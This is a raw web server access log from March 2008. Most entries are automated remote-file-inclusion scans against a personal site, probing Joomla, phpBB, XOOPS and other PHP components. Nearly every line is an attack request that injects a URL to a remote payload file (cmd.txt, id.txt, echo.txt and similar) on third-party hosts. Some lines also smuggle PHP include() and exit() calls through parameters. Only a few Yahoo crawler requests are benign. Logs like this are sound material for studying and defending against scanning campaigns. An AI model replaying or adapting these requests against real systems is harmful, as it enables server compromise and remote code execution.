222.255.3.68 - - [23/Mar/2008:07:45:44 -0700] "GET /index.php?option=com_restaurante&task=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:45:45 -0700] "GET /logs/index.php?option=com_restaurante&task=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.21.163.20 - - [23/Mar/2008:07:46:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:46:24 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:46:24 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:46:25 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.82.197.16 - - [23/Mar/2008:07:46:25 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.82.197.16 - - [23/Mar/2008:07:46:25 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.82.197.16 - - [23/Mar/2008:07:46:25 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:46:25 -0700] "GET /@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:46:26 -0700] "GET /logs/@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:07:46:37 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:07:46:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.82.197.16 - - [23/Mar/2008:07:46:39 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:25 -0700] "GET //config.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:25 -0700] "GET /logs//config.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:26 -0700] "GET //config.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:26 -0700] "GET /logs//config.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:28 -0700] "GET /logs//config.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.19.121.124 - - [23/Mar/2008:07:47:28 -0700] "GET //config.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.6.31.48 - - [23/Mar/2008:07:47:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.9.109 - - [23/Mar/2008:07:48:00 -0700] "GET /bikes/dteel/2008_02_15/?D=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.105 - - [23/Mar/2008:07:48:03 -0700] "GET /megumi/Bracelet/?N=D HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:48:05 -0700] "GET /logs/access.log/index.php?option=com_restaurante&task=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.240 - - [23/Mar/2008:07:48:11 -0700] "GET /config.php?path_to_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.27 - - [23/Mar/2008:07:48:24 -0700] "GET /logs/forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.151.27 - - [23/Mar/2008:07:48:29 -0700] "GET /forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:49:03 -0700] "GET /logs/access_071230.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:49:06 -0700] "GET /logs/access_080215.log///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:49:07 -0700] "GET ///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 3099 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:49:07 -0700] "GET /logs///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 39987 "-" "libwww-perl/5.808" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:49:18 -0700] "GET /logs/access_080219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:49:38 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:49:38 -0700] "GET /index.php?redir=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:49:38 -0700] "GET /logs/index.php?redir=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:49:40 -0700] "GET /errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:49:41 -0700] "GET /logs/errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:49:50 -0700] "GET /logs/access_080228.log//block.poll.php?where_cms=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:49:51 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:49:51 -0700] "GET /logs/access_080223.log///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:49:51 -0700] "GET //block.poll.php?where_cms=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:49:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:49:51 -0700] "GET /logs//block.poll.php?where_cms=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:49:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:50:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:07:50:20 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:50:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:50:29 -0700] "GET /logs/access_080219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:50:40 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:50:41 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:50:42 -0700] "GET /errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:50:42 -0700] "GET /logs/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:50:43 -0700] "GET /logs/access_080215.log/breadcrumb.php?rootBase=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:50:44 -0700] "GET /breadcrumb.php?rootBase=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:50:44 -0700] "GET /logs/breadcrumb.php?rootBase=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.172.175.102 - - [23/Mar/2008:07:50:51 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:07:50:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:07:50:53 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.223.191 - - [23/Mar/2008:07:51:08 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:51:14 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.223.191 - - [23/Mar/2008:07:51:27 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [23/Mar/2008:07:51:27 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [23/Mar/2008:07:51:28 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:52:02 -0700] "GET /logs/access_080312.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:52:31 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:52:31 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.252 - - [23/Mar/2008:07:52:33 -0700] "GET /tmp/sess_9bf0606ed85306a65cf8f71fc5fd75e9 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:53:15 -0700] "GET /logs/access_080223.log/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:53:15 -0700] "GET /index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:53:15 -0700] "GET /logs/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.184 - - [23/Mar/2008:07:53:29 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:53:30 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.184 - - [23/Mar/2008:07:53:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.178 - - [23/Mar/2008:07:53:48 -0700] "GET /bikes/?N=A HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:54:04 -0700] "GET /logs/access_080223.log///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:54:04 -0700] "GET ///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 3099 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:54:05 -0700] "GET /logs///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 39987 "-" "libwww-perl/5.808" "www.dmulk.com"
212.159.3.234 - - [23/Mar/2008:07:54:12 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://edu-web.eu/adds/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
212.159.3.234 - - [23/Mar/2008:07:54:12 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://edu-web.eu/adds/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.64.76.150 - - [23/Mar/2008:07:54:25 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.64.76.150 - - [23/Mar/2008:07:54:25 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:54:37 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:54:38 -0700] "GET /config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:54:38 -0700] "GET /logs/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:54:41 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:54:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:54:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:07:54:44 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:07:54:44 -0700] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:55:16 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:07:55:21 -0700] "GET /logs/access_080223.log/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:07:55:21 -0700] "GET /index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:07:55:22 -0700] "GET /logs/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:07:55:26 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:07:55:28 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:55:40 -0700] "GET /logs/access_080225.log/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.184 - - [23/Mar/2008:07:55:45 -0700] "GET /bikes/dteel/2008_01_26/?N=D HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:56:10 -0700] "GET //index.php?option=com_custompages&cpage=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:53 -0700] "GET /logs/access_080215.log/index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:53 -0700] "GET /index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:53 -0700] "GET /logs/index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:54 -0700] "GET /logs/access_080215.log/index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:54 -0700] "GET /index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:56:54 -0700] "GET /logs/index.php?open=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.7.175 - - [23/Mar/2008:07:56:57 -0700] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:07:57:58 -0700] "GET /logs/access_080225.log/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:58:15 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:58:16 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:58:17 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:07:58:20 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
